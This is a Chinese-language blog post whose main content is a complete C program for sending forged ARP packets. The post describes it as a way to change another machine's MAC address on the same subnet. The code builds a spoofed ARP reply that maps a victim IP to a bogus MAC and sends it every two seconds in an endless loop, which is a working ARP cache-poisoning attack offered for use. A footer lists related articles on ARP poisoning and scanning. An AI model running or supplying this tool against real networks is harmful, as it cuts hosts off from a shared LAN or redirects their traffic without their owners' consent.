ARP协议改mac地址

简介: ARP协议改mac地址

##改变同一网段别人的mac地址


#include <stdio.h>
#include <sys/socket.h>//socket
#include <arpa/inet.h>//htons
#include <netinet/ether.h>//ETH_P_ALL
#include <unistd.h>//close
#include <sys/ioctl.h>
#include <string.h>
#include <netpacket/packet.h>//sockaddr_ll
#include <net/if.h>//struct ifreq
#include <net/ethernet.h>//struct ether_header
#include <net/if_arp.h>//struct arphdr
int main(int argc, char const *argv[]){   
 //创建一个原始套接字  
   int fd = socket(PF_PACKET,SOCK_RAW,htons(ETH_P_ALL));
    //组包(arp)  
       unsigned char dst_mac[6]={0x70,0x5A,0x0F,0x63,0xF5,0x9D};   
        unsigned char src_mac[6]={0x00,0x00,0x00,0x00,0x00,0x00}; 
           unsigned char src_ip[4] = {10,0,121,217};  
       unsigned char dst_ip[4] = {10,0,121,196};    
    unsigned char msg[1500]="";
    //组mac头   
     struct ether_header *eth_hd = (struct ether_header *)msg;  
       //赋值目的mac   
        memcpy(eth_hd->ether_dhost,dst_mac,6);   
         //源mac  
           //memset(eth_hd->ether_shost,0,6); 
              memcpy(eth_hd->ether_shost,src_mac,6); 
                 //协议类型 
                    eth_hd->ether_type = htons(0x0806);
    //组arp头   
     struct arphdr *arp_hd = (struct arphdr *)(msg+14);  
       arp_hd->ar_hrd = htons(1);//硬件类型  
         arp_hd->ar_pro = htons(0x0800);//协议类型  
           arp_hd->ar_hln = 6;//硬件地址长度 
              arp_hd->ar_pln = 4;//协议地址长度  
                arp_hd->ar_op = htons(2);//应答  
                  memcpy(arp_hd->__ar_sha,src_mac,6);//源mac  
                    memcpy(arp_hd->__ar_sip,src_ip,4);//源ip  
                      memcpy(arp_hd->__ar_tha,dst_mac,6);//目的mac  
                        memcpy(arp_hd->__ar_tip,dst_ip,4);//目的ip
    int len = 42;
    //从原始套接字发送数据  
      //获取网络结构类型    
      struct ifreq ethreq;  
        strncpy(ethreq.ifr_name,"ens33",IFNAMSIZ); 
           ioctl(fd, SIOCGIFINDEX, &ethreq);
    //指明出去的网络接口    
    struct sockaddr_ll sll;   
     bzero(&sll,sizeof(sll)); 
        sll.sll_ifindex = ethreq.ifr_ifindex;
    while(1)  
      {     
         sendto(fd,msg,len,0,(struct sockaddr *)&sll, sizeof(sll)); 
                sleep(2);   
                 }      
                   close(fd);
    return 0;}
相关文章
|
25天前
|
网络协议 安全 NoSQL
网络空间安全之一个WH的超前沿全栈技术深入学习之路(8-2):scapy 定制 ARP 协议 、使用 nmap 进行僵尸扫描-实战演练、就怕你学成黑客啦!
scapy 定制 ARP 协议 、使用 nmap 进行僵尸扫描-实战演练等具体操作详解步骤;精典图示举例说明、注意点及常见报错问题所对应的解决方法IKUN和I原们你这要是学不会我直接退出江湖;好吧!!!
网络空间安全之一个WH的超前沿全栈技术深入学习之路(8-2):scapy 定制 ARP 协议 、使用 nmap 进行僵尸扫描-实战演练、就怕你学成黑客啦!
|
2月前
|
缓存 网络协议 网络架构
网络抓包分析【IP,ICMP,ARP】以及 IP数据报,MAC帧,ICMP报和ARP报的数据报格式
本文详细介绍了如何使用网络抓包工具Wireshark进行网络抓包分析,包括以太网v2 MAC帧、IP数据报、ICMP报文和ARP报文的格式,以及不同网络通信的过程。文章通过抓包分析展示了IP数据报、ICMP数据报和ARP数据报的具体信息,包括MAC地址、IP地址、ICMP类型和代码、以及ARP的硬件类型、协议类型、操作类型等。通过这些分析,可以更好地理解网络协议的工作机制和数据传输过程。
网络抓包分析【IP,ICMP,ARP】以及 IP数据报,MAC帧,ICMP报和ARP报的数据报格式
|
1月前
|
缓存 网络协议 Linux
Python渗透测试之ARP毒化和协议应用
Python渗透测试之ARP毒化和协议应用
|
3月前
|
网络协议
用户态协议栈04-定时arp-table的实现
用户态协议栈04-定时arp-table的实现
|
3月前
|
缓存 网络协议
用户态协议栈02-arp reply实现
用户态协议栈02-arp reply实现
|
3月前
|
网络协议 安全 网络安全
ARP协议详解及其工作原理
【8月更文挑战第31天】
135 0
|
3月前
|
存储 缓存 监控
|
3月前
|
存储 缓存 网络协议
MAC协议原理与ARP协议
总结一下,MAC协议是控制同一网络媒介上多个设备的数据访问的规范,而ARP是解决局域网络中的IP地址到MAC地址的转换问题,以确保IP包能在本地网络上传输到正确的设备。尽管这两种协议服务于网络通信中的不同层面,但它们都是网络正常操作的基本要素,保证了数据能从一个设备准确无误地传递到另一个设备。
48 0
|
4月前
|
存储 缓存 网络协议
ARP 地址解析协议
ARP 地址解析协议
83 0
|
4月前
|
人工智能 缓存 网络协议
网络层之三层交换、icmp协议、arp协议
网络层之三层交换、icmp协议、arp协议